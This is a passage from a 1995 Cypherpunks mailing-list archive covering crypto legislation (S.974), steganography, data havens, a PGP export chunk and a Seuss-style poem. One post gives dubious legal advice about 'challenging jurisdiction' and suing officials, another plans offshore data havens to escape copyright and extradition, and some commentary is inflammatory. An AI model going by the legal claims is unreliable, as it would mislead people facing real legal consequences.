2nLdBor/XJENRrTmW38sya8x5vuDKwOLMMCTVgsg2QxzbGIk1jE2JjYmi2tqmISf V69UVKfvEsqhq9uKUksJG8tmoiyFs4b0Ctra/n/AibxYYKcCK5Qb3g== =/c9H -----END PGP SIGNATURE----- From frogfarm at yakko.cs.wmich.edu Thu Jul 13 20:09:45 1995 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Thu, 13 Jul 95 20:09:45 PDT Subject: Suing/Reputations (was: Root Causes) In-Reply-To: Message-ID: <199507140314.XAA05815@yakko.cs.wmich.edu> Robert A. Hayden writes: > If I understand, you can't sue the government for just trying to pass a > law, or for even passing it. What has to happen is that somebody needs > to be arrested and charged with breaking the law before you can challenge > them. Correct, insofar as American jurisprudence is concerned (and a big hello to all our friends in the rest of the world!). A few citations, hopefully relevant: "States and state officials acting officially are held not to be 'persons' subject to liability under 42 USCS section 1983." Wills v. Michigan Dept. of State Police, 105 L.Ed. 2nd 45 (1989). Title 42 of the United States Code is the section that describes the process by which one may sue a government official. However: "...an officer may be held liable in damages to any person injured in consequence of a breach of any of the duties connected with his office...The liability for nonfeasance, misfeasance, and for malfeasance in office is in his 'individual', not his official capacity..." 70 AmJur2nd Sec. 50, VII Civil Liability. So the trick is to sue the offender as an individual, and not as a government official. "A plaintiff who seeks damages for violation of constitutional or statutory rights may overcome the defendant official's qualified immunity only by showing that those rights were clearly established at the time of the conduct at issue." Davis v. Scherer, 82 L.Ed.2d 139,151. In summary: Failure to object timely is fatal. You must immediately let someone know when they are violating your rights, and what the possible penalties are, and give them the opportunity to stop, and be able to show as evidence that they continued their actions despite your clear warning of the consequences. Title 42 USC )1983: "Every person who, under color of any statute, ordinance, regulation, custom, or usage, of any State or territory, or the District of Columbia, subjects, or causes to be subjected, any citizen of the United States, or other person within the jurisdiction thereof, to the deprivation of any rights, privileges, or immunities secured by the Constitution and laws, shall be liable to the party injured in an action at law, suit in equity or other proper proceedings for redress." Notice that this statute recognizes that "statutes, ordinances, regulations and customs" can violate your rights. Where they do so, it's up to you to challenge the law's jurisdiction over you. Failure to challenge jurisdiction at the first instance of a rights violation can be fatal to your case, and will be seen as an admission that the law in question does indeed have lawful jurisdiction over you. "To maintain an action under 42 USC 1983, it is not necessary to allege or prove that the defendants intended to deprive plaintiff of his Constitutional rights or that they acted willfully, purposefully, or in a furtherance of a conspiracy. . . it is sufficient to establish that the deprivation. . . was the natural consequences of defendants acting under color of law. . . ." Ethridge v. Rhodos, DC Ohio 268 F Supp 83 (1967), Whirl v. Kern CA 5 Texas 407 F 2d 781 (1968) Further, United States Code, Title 18, section 242 provides for "one or more persons who, under color of law, statute, ordinance, regulation, or custom, willfully subjects any inhabitant of any state, territory, or district to the deprivation of rights, privileges, or immunities secured or protected by the Constitution or laws of the United States. . . shall be fined not more than $1,000 or imprisoned not more than one year or both." This means you can sue for conspiracy if there's more than one person involved, such as a magistrate acting in collusion with a police officer. And you are able to sue them as individuals because: "...an...officer who acts in violation of the Constitution ceases to represent the government." Brookfield Co. v Stuart, (1964) 234 F. Supp 94, 99 (U.S.D.C., Wash.D.C.) On a more relevant note: > Although publishing an "Enemies of the Constitution" list all over the > net, listing which congress-critters opposed the constitution (suck as > Exon) might be interesting. Might even make a good web project. *ponders* Well, the Internet Advertisers Blacklist seems to be doing pretty well, despite the obvious backlash by the likes of Marthe Siegel. The Idea Futures market also seems to be doing a hot business. The recent focus here on 'moderated' areas and whether the signal-to-noise ratio is worth the added layer of 'authority' shows the need for individual choice. I may choose to have person A forward me Cypherpunks excerpts, person B specific rec.toys.lego postings, etc. Or I can use software (getting better all the time) to act as an intelligent agent and find articles for me. Or most likely, I'll use a combination of the two, and I suspect most folks will choose this as well when they are made aware of the respective advantages and disadvantages of each method. In sum, "reputation markets" as Tim described are just starting to take off. The need for strong security tools increases with it. What if some big-name megacorp put up a page with all kinds of financial transaction options - and suffered a mass boycott because they refused to use PGP? If someone feels like creating an "Enemies of the Constitution" list, I'd certainly be interested; even more so if there were competitors doing similar projects. Folks may think the pot's boiling now, but remember: We're the frogs who, at the very least, know what's coming, even if we aren't able to jump completely out. "Forwarned is forearmed." Every time government does something stupid and outrageous, they piss off a few more people. Mass disobedience (preferably nonviolent) will become more common, and this is definitely a Good Thing. (Blatant plug: My home page has links to both the Net Advertisers Blacklist and the Idea Futures page, along with lots of other things. It's at: http://yakko.cs.wmich.edu/~frogfarm All constructive comments are welcomed.) -- frogfarm at yakko.cs.wmich.edu | To ensure ABSOLUTE FREEDOM, take RESPONSIBILITY imschira at nyx10.cs.du.edu | Encrypt! Encrypt! All-One-Key! Complete Privacy Damaged Justice | through Complex Mathematics! God's law PREVENTS Need net.help? I'm available | decryption above 1024 bytes - Exceptions? None! From Christopher.Baker at f14.n374.z1.fidonet.org Thu Jul 13 20:11:27 1995 From: Christopher.Baker at f14.n374.z1.fidonet.org (Christopher Baker) Date: Thu, 13 Jul 95 20:11:27 PDT Subject: Dr. Seuss, Technical Writer Message-ID: * In a message posted via CYPHERPUNKS dated: 11 Jul 95, you stated: > What If Dr. Seuss Did Technical Writing? > > Here's an easy game to play. > Here's an easy thing to say: and what if there was a complete version of this somewhere? [grin] --- Following message extracted from REC.ORG.MENSA @ 1:374/14 --- By Christopher Baker on Thu Dec 15 11:27:49 1994 From: Mike Steiner To: All Date: 15 Dec 94 02:40:52 Subj: Bits in a Box From: steiner at best.com (Mike Steiner) Organization: Society for the Preservation of Endangered Societies A Grandchild's Guide to Using Grandpa's Computer Bits Bytes Chips Clocks Bits in bytes on chips in box. Bytes with bits and chips with clocks. Chips in box on ether-docks. Chips with bits come. Chips with bytes come. Chips with bits and bytes and clocks come. Look, sir. Look, sir. Read the book, sir. Let's do tricks with bits and bytes, sir. Let's do tricks with chips and clocks, sir. First, I'll make a quick trick bit stack. Then I'll make a quick trick byte stack. You can make a quick trick chip stack. You can make a quick trick clock stack. And here's a new trick on the scene. Bits in bytes for your machine. Bytes in words to fill your screen. Now we come to ticks and tocks, sir. Try to say this by the clock, sir. Clocks on chips tick. Clocks on chips tock. Eight byte bits tick. Eight bit bytes tock. Clocks on chips with eight bit bytes tick. Chips with clocks and eight byte bits tock. Here's an easy game to play. Here's an easy thing to say.... If a packet hits a pocket on a socket on a port, and the bus is interupted as a very last resort, and the address of the memory makes your floppy disk abort then the socket packet pocket has an error to report! If your cursor finds a menu item followed by a dash, and the double-clicking icon puts your window in the trash, and your data is corrupted cause the index doesn't hash, then your situation's hopeless, and your system's gonna crash! You can't say this? What a shame, sir! We'll find you another game, sir. If the label on the cable on the table at your house says the network is connected to the button on your mouse, but your packets want to tunnel on another protocol, that's repeatedly rejected by the printer down the hall, and your screen is all distorted by the side-effects of gauss, so your icons in the window are as wavy as a souse, then you may as well reboot and go out with a bang, cause as sure as I'm a poet, the sucker's gonna hang! When the copy of your floppy's getting sloppy on the disk, and the microcode instructions cause unnecessary risc, then you have to flash your memory and you'll want to RAM your ROM. Quickly turn off your computer and be sure to tell your mom! (God bless you Dr. Seuss wherever you are!) +----------------------------------------------------------------------+ Origin: COBRUS - Usenet-to-Fidonet Distribution System (1:2613/335.0) -30- TTFN. Chris --- GenMsg [0002] (cbak.rights at opus.global.org) From rah at shipwright.com Thu Jul 13 20:34:21 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 13 Jul 95 20:34:21 PDT Subject: who knows about Security First Network Bank Message-ID: >X-Sender: blanneau at pic.net >Mime-Version: 1.0 >Date: Thu, 13 Jul 1995 17:04:41 -0500 >To: MINITERS at Citadel.edu >From: blanneau at bilbo.pic.net (Bazile R. Lanneau, Jr.) >Subject: Re: who knows about Security First Network Bank >Cc: www-buyinfo at allegra.att.com > >Are you trying to find it? http://www.sfnb.com >Neat site! > >------------------------------------------ >Bazile Lanneau >Britton & Koontz First National Bank >Natchez, MS 39120 >601-445-5576 >blanneau at pic.net >blanneau at bkbank.com (Soon) > > >>>Date: Thu, 13 Jul 1995 13:32:04 -0400 (EDT) >>>From: Syl Miniter 803-768-3759 >>>Subject: who knows about Security First Network Bank >>>To: cypherpunks at toad.com >>>Cc: MINITERS at Citadel.edu >>>Mime-Version: 1.0 >>>Sender: owner-cypherpunks at toad.com >>>Precedence: bulk >>> >>>There is an extensive article in the July issue of "Bank Technology News >>>about >>>a startup Internet bank by the name above. >>>Does anyone know about this outfit. >>> >> >>----------------- >>Robert Hettinga (rah at shipwright.com) >>Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 >>USA (617) 323-7923 >>"Reality is not optional." --Thomas Sowell >>>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< >> >> >> >> > ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From hal9001 at panix.com Thu Jul 13 20:36:04 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Thu, 13 Jul 95 20:36:04 PDT Subject: Eudora MacPGP Woes Message-ID: At 14:40 7/8/95, Black Unicorn wrote: >I have noticed that an X-Attachement: header is added, but I have no idea >how to remove it without opening the Eudora outbox with teachtext or >something. Highlight the file name on the attachments line and hit delete to remove an attached file request. From pgf at tyrell.net Thu Jul 13 20:37:17 1995 From: pgf at tyrell.net (Phil Fraering) Date: Thu, 13 Jul 95 20:37:17 PDT Subject: Legislation question... Message-ID: <199507140331.AA07147@tyrell.net> I may be a bit behind the times, but I have a question about the "ban crypto-anarchy" legislation as well as the Exon amendment: Isn't legislation in this country supposed to start in the House and _then_ move to the Senate for approval? Why are all of these bills going in the opposite direction? Phil From perry at imsi.com Thu Jul 13 20:43:28 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 20:43:28 PDT Subject: Legislation question... In-Reply-To: <199507140331.AA07147@tyrell.net> Message-ID: <9507140342.AA13574@snark.imsi.com> Phil Fraering writes: > I may be a bit behind the times, but I have a question > about the "ban crypto-anarchy" legislation as well as > the Exon amendment: > > Isn't legislation in this country supposed to start in the > House and _then_ move to the Senate for approval? > > Why are all of these bills going in the opposite direction? Legislation can originate in either house. The constitution says only that "All bills for raising revenue shall originate in the House of Representatives; but the Senate may propose or concur with amendments as on other bills." This particular rule is often breeched in reality, by the way, but there is no enforcement mechanism to stop it. BTW, in re suing congressmen "The Senators and Representatives shall [...] in all cases, except treason, felony and breach of the peace, be privileged from arrest during their attendance at the session of their respective Houses, and in going to and returning from the same; and for any speech or debate in either House, they shall not be questioned in any other place." The last part being operative. .pm From bigdaddy at ccnet.com Thu Jul 13 20:54:51 1995 From: bigdaddy at ccnet.com (Le Dieu D'Informations Insensibles...) Date: Thu, 13 Jul 95 20:54:51 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: <199507140351.UAA23945@ccnet.ccnet.com> -----BEGIN PGP SIGNED MESSAGE----- >On Thu, 13 Jul 1995, Ray Arachelian wrote: >How about "not respecting international copyright law, and not having >extradition treaties with the US" ... set up a data haven, we now know >why we need it soon... charge by the Kbyte, automate the billing, and relax. How about one of the Middle Eastern countries? Saudi Arabia would have been good until recently, but they've just signed the Berne Convention on copyrights...so there's one down. On the plus side, the authorities haven't banned crypto yet. Why? One only wonders. Kuwait has ready-made Internet access, but is, if I'm not mistaken, also a signatory to the international copyright convention. Both Kuwait and the KSA are also very friendly with the U.S., though I cannot name any specific case of extradition between the two countries. Given the choice between a Saudi court and a U.S. one, however, I'd pick the U.S. :-) Why not Yemen, Oman, or Lebanon? We'd have to start an ISP by ourselves, but the countries are small enough...or just recovering from civil war...such that nothing would be noticed(fingers crossed). Oman has CISnet access...maybe something could be built on that. For Yemen or Lebanon, we'd have to get a satellite hookup(which presents its own problems). Besides, Oman has simply _beautiful_ scenery. :-) >Anybody seriously interested? In theory. To actually set up a data haven takes more resources than I have. IMHO, however, one of the smaller Middle Eastern countries would be good, as they generally don't(unless I'm mistaken) have reciprocal copyright treaties with the U.S., are not generally signatories of the Berne Convention (except KSA and the UAE and maybe Kuwait), and do not look likely to outlaw crypto. Thoughts? David Molnar -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMAVbweFDHpuTkgoVAQHt8Af/VkW5FIqpd46ydnchTpSfKZUS+c4Aviu6 ZQA2UYY5GbCQhyKNJ6Tk2OKJI82vfOpo+n+uSZfvAWnLlxrzQ1mDJxJ9wWaaAa4u WIG4XWbGCFetRYAVYF+h/I6zG7+zCE8N3bn2kAcAz7SoDgqGP1CXiXsXmEiqBJNS O8U8nM1ZFZ4KZBwShf5SsprKgKP98TCmWJc7L5li9Pco7HyLzBdsHUz2pJgCd4Eh rp/8jfzu2so/tF5EHkjGIcPUnp0rEfZ5gKc/gimDloHfyzVxA3ITraXe8xOZF3iX sICCpBb+qoDLzvt5lM+Vpm7+pUa/fF+OJB0+eX4gNw/a082gH6LeOg== =rmDi -----END PGP SIGNATURE----- lo...look to the sig, for there will be no sign From an250888 at anon.penet.fi Thu Jul 13 21:06:09 1995 From: an250888 at anon.penet.fi (an250888 at anon.penet.fi) Date: Thu, 13 Jul 95 21:06:09 PDT Subject: Deployment Message-ID: <9507140349.AA21714@anon.penet.fi> >In addition, now is the time to deploy stego, on a massive scale. >How many stego programs have been released for Unix? Unix? The masses use DOS, Windows, Mac, and OS/2. All you Unix gurus with nifty Unix crypto utilities that PC users can only wonder about need to buy PC's and start porting now if you want to get anywhere. Unix? Hah! Gimme a break! Unix is a Warsaw ghetto. ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From an250888 at anon.penet.fi Thu Jul 13 21:07:02 1995 From: an250888 at anon.penet.fi (an250888 at anon.penet.fi) Date: Thu, 13 Jul 95 21:07:02 PDT Subject: Off Your But and Learn! Message-ID: <9507140349.AA21822@anon.penet.fi> >I am not a programmer either, but I am being motivated to become one. >If only there was more time. Neither am I, but may I suggest the following: S. Prata, C++ Primer Plus: Teach Yourself Object-Oriented Programming, 2d ed., Waite Group Press, ISBN 1-878739-74-3 (1995). Nuts & bolts. S. Lippman, C++ Primer, 2d ed., Addison-Wesley, ISBN 0-201-54848-8 (1993). Not quite so nuts and bolts, but good to read after covering the treatment of the same material in Prata. I've just starting working through these and find them effective. ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From zhanna at jax.jaxnet.com Thu Jul 13 21:08:48 1995 From: zhanna at jax.jaxnet.com (Zachary H. Hanna) Date: Thu, 13 Jul 95 21:08:48 PDT Subject: No Subject Message-ID: <199507140410.AAA12152@jax.jaxnet.com> -- [ From: Zachary H. Hanna * EMC.Ver #2.5.02 ] -- Sure, what the hell. ------------------ PGP.ZIP Part [029/713] ------------------- MA at AT14NXXX4KXP+G,!8*\;,+L6`0&L`./;4)LO9H"`=4U&84>M#/RD(3F,,`9?Q+[-9Q##G;BD8XQBPLXB3W8 MC%1$H at MD*/4B3^Q'.M[':!@AQ[TZ";+/L`63,`@!>$C=OL,4#,5VGP19+`9" ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From lmccarth at cs.umass.edu Thu Jul 13 21:12:09 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Thu, 13 Jul 95 21:12:09 PDT Subject: Stego Standards Silly ? (Was: Re: def'n of "computer network") In-Reply-To: <9507140229.AA13447@snark.imsi.com> Message-ID: <9507140411.AA15519@cs.umass.edu> -----BEGIN PGP SIGNED MESSAGE----- .pm writes: > Indeed -- how could the recipient even know to look, unless these > things arrived regularly and with a fully standardized form of > stegonography, in which case why bother, all you've done is come up > with a very odd form of transfer encoding. I agree, but AFAICS an odd form of transfer encoding is exactly what the doctor ordered. For plausible cryptodeniability, one wants to send ciphertext using a transfer encoding that doesn't automatically ring alarm bells. Steganography amounts to laundering Content-Type: headers. > If the recipient does know to look, that implies either that there is > a hint, in which case the stegonography is useless, or it implies that > you have prearrangement, in which case my comments on prearrangement > hold. If the recipient isn't getting spammed with GIFs (or whatever), she (or rather her MDA) can simply look at all of them by default. Of course this does not help with anonymous message pools on the order of Usenet, but that is a sub-issue. Deranged Mutant raised an IMHO important issue a few months ago. He suggested that Mallet could go about trashing the purportedly "random" bits in each instantiation of some transfer encoding used in a stego standard. For example, he shuffles the LSBs of every passing JPEG. I'm not sure how feasible this would really be (both technically and sociopolitically), but it could be a big annoyance if only a few people were suspected of using stego method XYZ. The standard answer to agent-in-the-middle tampering is of course digital signatures. Now, the question is, will we be allowed to sign our possibly-stego-enclosing GIFs with reasonable confidence that the govt. can't forge our signatures ? Obviously the signature itself can't be stegoed, or else we fall into an infinite regress. -Futplex -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAXuSWf7YYibNzjpAQHlpQP/f3/e5iRl67zU3TLYZH1oNBBjC1+LYPH8 VkQMhvtRdlo2xBkY56jaZ6hZuzWanknVD1EKrG72vl5sPytXXDs5dVplFlelVw6f VjC2UxNHe0dQHmmJqXNMMq4qlC8ZxgtNf4P9O+6iJKjz6SbA7F6LuRd+3TXv5tHm xgGSY5bzJp8= =ia+X -----END PGP SIGNATURE----- From ericande at linknet.kitsap.lib.wa.us Thu Jul 13 21:30:36 1995 From: ericande at linknet.kitsap.lib.wa.us (Eric Anderson) Date: Thu, 13 Jul 95 21:30:36 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: Message-ID: What time is the Five minute hate? Amerika: land of the Freeh, home of the slave From therogue at hopf.dnai.com Thu Jul 13 22:09:00 1995 From: therogue at hopf.dnai.com (Eric Barnes) Date: Thu, 13 Jul 95 22:09:00 PDT Subject: EFF analysis: Anti-Electronic Racketeering Act (S.974) (fwd) Message-ID: Comments added by me to Grassley's speech. Eric Barnes > >From: ssteele at eff.org (Shari Steele) > >***** FEEL FREE TO DISTRIBUTE WIDELY ***** > >On June 27, Senator Grassley (R-Iowa) introduced the Anti-Electronic >Racketeering Act, S.974. The bill was designed "to prohibit certain acts >involving the use of computers in the furtherance of crimes, and for other >purposes." Its immediate effect, among other things, would be to >criminalize the posting of any encryption software on any computer network >that foreign nationals can access (in other words, any computer network >period). Because of poor wording, the bill would probably also criminalize >data compression and other non-cryptographic encoding schemes available on >networks. This includes the compression used in most of the images on >Internet user's WWW homepages, not to mention uu and binhex encoding for >transferring binary files via email, and even language encoding used to >represent non-English characters, such as the SJIS scheme for representing >Japanese characters. > >In addition, the bill seems to be directed at undermining two big fights >we've successfully waged in the past: the Steve Jackson Games decision >against the United States Secret Service and the government's Clipper Chip >proposal. > >Re: Steve Jackson Games -- this bill would permit the government to avoid >the notice requirements of the Privacy Protection Act if "there is reason >to believe that the immediate seizure of such materials is necessary to >prevent the destruction or altercation [very Freudian sic!] of such >documents." Furthermore, the government could use electronic evidence >seized that had not been particularly described in a warrant if > >"the seizure is incidental to an otherwise valid seizure, and the >government officer or employee- > > ''(A) was not aware that work product material was among the data seized; > > ''(B) upon actual discovery of the existence of work product materials, the >government officer or employee took reasonable steps to protect the privacy >interests recognized by this section, including- > > ''(i) using utility software to seek and identify electronically stored data >that may be commingled or combined with non-work product material; and > > ''(ii) upon actual identification of such material, taking reasonable steps >to protect the privacy of the material, including seeking a search warrant." > >Re: Clipper Chip -- The bill would make it a crime "to distribute computer >software that encodes or encrypts electronic or digital communications to >computer networks that the person distributing the software knows or >reasonably should know, is accessible to foreign nationals and foreign >governments, regardless of whether such software has been designated as >nonexportable." However, there is an exception: "It shall be an >affirmative defense to prosecution under this section that the software at >issue used a universal decoding device or program that was provided to the >Department of Justice prior to the distribution." This is essentially an >attempt to sneak the key "escrow" provisions of the Clipper scheme in >through a legislative back door. > >Fortunately, the bill does not have a very promising future. The bill has >no co-sponsors. It was immediately referred to the Committee on the >Judiciary, where it currently sits. LEXIS's bill tracking report only >gives it a 10% chance of passing out of the committee. > >I thought Senator Grassley's own statement when he introduced the bill is >worth reading, so I'm attaching it here. My favorite line is "Elliott Ness >needs to meet the Internet." This is especially ironic in light of recent >comparisons of hysteria about "dangerous" material on the internet, and >Prohibition. > >The bill itself follows. >Shari > >>------------------------------------------------------------------------ >>Shari Steele, Director of Legal Services ssteele at eff.org >>Electronic Frontier Foundation 202/861-7700 (voice) >>1667 K Street, N.W., Suite 801 202/861-1258 (fax) >>Washington, DC 20006-1605 202/861-1224 (BBS) >> >> >> >>---------- Senator Grassley's Statement to the Senate ---------- >> >> Mr. President, I rise this evening to introduce the Anti-electronic >>Racketeering Act of 1995. This bill makes important changes to RICO and >>criminalizes deliberately using computer technology to engage in criminal >>activity. I believe this bill is a reasonable, measured and strong response >>to a growing problem. According to the computer emergency and response >>team at Carnegie-Mellon University, during 1994, about 40,000 computer >>users were attacked. Virus hacker, the FBI's national computer crime squad >>has investigated over 200 cases since 1991. So, computer crime is clearly >>on the rise. >*Was this not the same Carnegie-Mellon University involved in the horrific >Time Ragazine "Cyberporn" article? The one which will take no >responsibility for the incredibly poor research done by one of their >undergraduates? Which seems to take no stand on proper research procedures >used by their students? >> >> Mr. President, I suppose that some of this is just natural. Whenever man >>develops a new technology, that technology will be abused by some. And that is >>why I have introduced this bill. I believe we need to seriously reconsider the >>Federal Criminal Code with an eye toward modernizing existing statutes and >>creating new ones. In other words, Mr. President, Elliot Ness needs to >>meet the >>Internet. >*Being a politician, of course he considers criminality natural. It goes >with the territory. And like so many of them, drunk with their potential >power over the people (Dear God, let us no longer speak of "servants of the >People), attacking every single user of computers, world wide at that, is >also a "natural" response. >> >> Mr. President, I sit on the Board of the Office of Technology Assessment. >>That Office has clearly indicated that organized crime has entered >>cyberspace in >>a big way. International drug cartels use computers to launder drug money and >>terrorists like the Oklahoma City bombers use computers to conspire to commit >>crimes. >*Ah..and notice how he carefully leaves out any empirical data? This >Board, whatever the hell it is, "has clearly indicated" something...which >just happens to fit in with Grassley's political ambitions and desperate >need to be the center of attention. And so he raises the unfounded >"organized crime" and "terrorist" and "conspiracy" flags to frighten us >all. And to make matters truly worse, there is no evidence or indication >that the Internet was even used in the OK City debacle, much less >encryption. As a matter of fact, our vaunted FBI has yet to even bring an >indictment in the case! >> >> Computer fraud accounts for the loss of millions of dollars per year. >*Mostly through the use of bank wires...not available to the rest of us. > > And often times, there is little that can be done about this because the >computer >>used to commit the crimes is located overseas. So, under my bill, overseas >>computer users who employ their computers to commit fraud in the United States >>would be fully subject to the Federal criminal laws. Also under my bill, Mr. >>President, the wire fraud statute which has been successfully used by >>prosecutors for many users, will be amended to make fraudulent schemes >>which use >>computers a crime. >*I can see it now. You typed a letter on a computer? You're dead, >buddy!!! And anyone who happened to have received that letter, whether >involved or not, would also be guilty by association. Good going, >Grassley. Fine grasp of the Constitution there. >> >> It is not enough to simply modernize the Criminal Code. We also have to >>reconsider many of the difficult procedural burdens that prosecutors must >>overcome. For instance, in the typical case, prosecutors must identify a >>location in order to get a wiretapping order. But in cyberspace, it is often >>impossible to determine the location. And so my bill corrects that so that if >>prosecutors cannot, with the exercise of effort, give the court a >>location, then >>those prosecutors can still get a wiretapping order. And for law >>enforcers-both >>State and Federal-who have seized a computer which contains both contraband or >>evidence and purely private material, I have created a good-faith standard so >>that law enforcers are not shackled by undue restrictions but will also be >>punished for bad faith. >*Oh, Dear God! He's gonna protect us from the enforcers. How terribly kind. >> >> Mr. President, this brave new world of electronic communications and global >>computer networks holds much promise. But like almost anything, there is the >>potential for abuse and harm. That is why I urge my colleagues to support this >>bill and that is why I urge industry to support this bill. >*Oh, yes...let's be sure that any promise is nipped in the bud as our >sacred government, which has shown such a dandy predilection for abuse of >power through the years, is given accerss to any and all private >communications, no matter from whom or to whom. With a Senator like this, >who needs a Fuhreur? I hope Iowans take a long look at this idiot next >time the ballots are being cast. >> >> On a final note, I would say that we should not be too scared of >>technology. >>After all, we are still just people and right is still right and wrong is >>still >>wrong. Some things change and some things do not. All that my bill does is say >>you can't use computers to steal, to threaten others or conceal criminal >>conduct. >*And this chump is willing to flush the entire Constitution down the toilet >in order to save us all from that which can, and will, be done by many >other means. Notice his "all my bill does", then defines what he wants us >to believe. And this is one of the Republicans who has promised to get the >Federal government off our backs? Oh, yes, there *is* a Santa Claus, >Virginia. But be very careful of his hands when he gives you that fatherly >hug. This one will rape us all if given the chance! > >Eric Barnes >> >> Mr. President, I ask unanimous consent that the text of the bill be printed >>in the Record. >> >> There being no objection, the bill was ordered to be printed in the Record, >>as follows: >> >> S. 974 >> >> >> >> SECTION 1. SHORT TITLE. >> >> This Act may be cited as the ''Anti-Electronic Racketeering Act of 1995''. >> >> SEC. 2. PROHIBITED ACTIVITIES. >> >> (a) Definitions .-Section 1961(1) of title 18, United States Code, is >>amended- >> >> (1) by striking ''1343 (relating to wire fraud)'' and inserting ''1343 >>(relating to wire and computer fraud)''; >> >> (2) by striking ''that title'' and inserting ''this title''; >> >> (3) by striking ''or (E)'' and inserting ''(E)''; and >> >> (4) by inserting before the semicolon the following: ''or (F) any act >>that is >>indictable under section 1030, 1030A, or 1962(d)(2)''. >> >> (b) Use of Computer To Facilitate Racketeering Enterprise .-Section 1962 of >>title 18, United States Code, is amended- >> >> (1) by redesignating subsection (d) as subsection (e); and >> >> (2) by inserting after subsection (c) the following new subsection: >> >> ''(d) It shall be unlawful for any person- >> >> ''(1) to use any computer or computer network in furtherance of a >>racketeering activity (as defined in section 1961(1)); or >> >> ''(2) to damage or threaten to damage electronically or digitally stored >>data.''. >> >> (c) Criminal Penalties .-Section 1963(b) of title 18, United States >>Code, is >>amended- >> >> (1) by striking ''and'' at the end of paragraph (1); >> >> (2) by striking the period at the end of paragraph (2) and inserting ''; >>and''; and >> >> (3) by adding at the end the following new paragraph: >> >> ''(3) electronically or digitally stored data.''. >> >> (d) Civil Remedies .-Section 1964(c) of title 18, United States Code, is >>amended by striking ''his property or business''. [*S9181] >> >> (e) Use as Evidence of Intercepted Wire or Oral Communications >>.-Section 2515 >>of title 18, United States Code, is amended by inserting before the period at >>the end the following: '', unless the authority in possession of the >>intercepted >>communication attempted in good faith to comply with this chapter. If the >>United >>States or any State of the United States, or subdivision thereof, possesses a >>communication intercepted by a nongovernmental actor, without the knowledge of >>the United States, that State, or that subdivision, the communication may be >>introduced into evidence''. >> >> (f) Authorization for Interception of Wire, Oral, or Electronic >>Communications .-Section 2516(1) of title 18, United States Code, is amended- >> >> (1) by striking ''and'' at the end of paragraph (n); >> >> (2) by striking the period at the end of paragraph () and inserting ''; >>and''; and >> >> (3) by adding at the end the following new paragraph: >> >> ''(p) any violation of section 1962 of title 18.''. >> >> (g) Procedures for Interception .-Section 2518(4)(b) of title 18, United >>States Code, is amended by inserting before the semicolon the following: ''to >>the extent feasible''. >> >> (h) Computer Crimes .- >> >> (1) New prohibited activities .-Chapter 47 of title 18, United States Code, >>is amended by adding at the end the following new section: >> >> '' 1A1030A. Racketeering-related crimes involving computers >> >> ''(a) It shall be unlawful- >> >> ''(1) to use a computer or computer network to transfer unlicensed computer >>software, regardless of whether the transfer is performed for economic >>consideration; >> >> ''(2) to distribute computer software that encodes or encrypts >>electronic or >>digital communications to computer networks that the person distributing the >>software knows or reasonably should know, is accessible to foreign >>nationals and >>foreign governments, regardless of whether such software has been >>designated as >>nonexportable; and >> >> ''(3) to use a computer or computer network to transmit a communication >>intended to conceal or hide the origin of money or other assets, tangible or >>intangible, that were derived from racketeering activity; and >> >> ''(4) to operate a computer or computer network primarily to facilitate >>racketeering activity or primarily to engage in conduct prohibited by >>Federal or >>State law. >> >> ''(b) For purposes of this section, each act of distributing software is >>considered a separate predicate act. Each instance in which nonexportable >>software is accessed by a foreign government, an agent of a foreign >>government, >>a foreign national, or an agent of a foreign national, shall be >>considered as a >>separate predicate act. >> >> ''(c) It shall be an affirmative defense to prosecution under this section >>that the software at issue used a universal decoding device or program >>that was >>provided to the Department of Justice prior to the distribution.''. >> >> (2) Clerical amendment .-The analysis at the beginning of chapter 47, >>United >>States Code, is amended by adding at the end the following new item: >> >> ''1030A. Racketeering-related crimes involving computers.''. >> >> (3) Jurisdiction and venue .-Section 1030 of title 18, United States >>Code, is >>amended by adding at the end the following new subsection: >> >> ''(g)(1)(A) Any act prohibited by this section that is committed using any >>computer, computer facility, or computer network that is physically located >>within the territorial jurisdiction of the United States shall be deemed >>to have >>been committed within the territorial jurisdiction of the United States. >> >> ''(B) Any action taken in furtherance of an act described in >>subparagraph (A) >>shall be deemed to have been committed in the territorial jurisdiction of the >>United States. >> >> ''(2) In any prosecution under this section involving acts deemed to be >>committed within the territorial jurisdiction of the United States under this >>subsection, venue shall be proper where the computer, computer facility, or >>computer network was physically situated at the time at least one of the >>wrongful acts was committed.''. >> >> (i) Wire and Computer Fraud .-Section 1343 of title 18, United States Code, >>is amended by striking ''or television communication'' and inserting >>''television communication, or computer network or facility''. >> >> (j) Privacy Protection Act .-Section 101 of the Privacy Protection Act of >>1980 (42 U.S.C. 2000aa) is amended- >> >> (1) in subsection (a)- >> >> (A) by striking ''or'' at the end of paragraph (1); >> >> (B) by striking the period at the end of paragraph (2) and inserting ''; >>or''; and >> >> (C) by adding at the end the following new paragraph: >> >> ''(3) there is reason to believe that the immediate seizure of such >>materials >>is necessary to prevent the destruction or altercation of such >>documents.''; and >> >> (2) in subsection (b)- >> >> (A) by striking ''or'' at the end of paragraph (3); >> >> (B) by striking the period at the end of paragraph (4) and inserting ''; >>or''; and >> >> (C) by adding at the end the following new paragraph: >> >> ''(5) in the 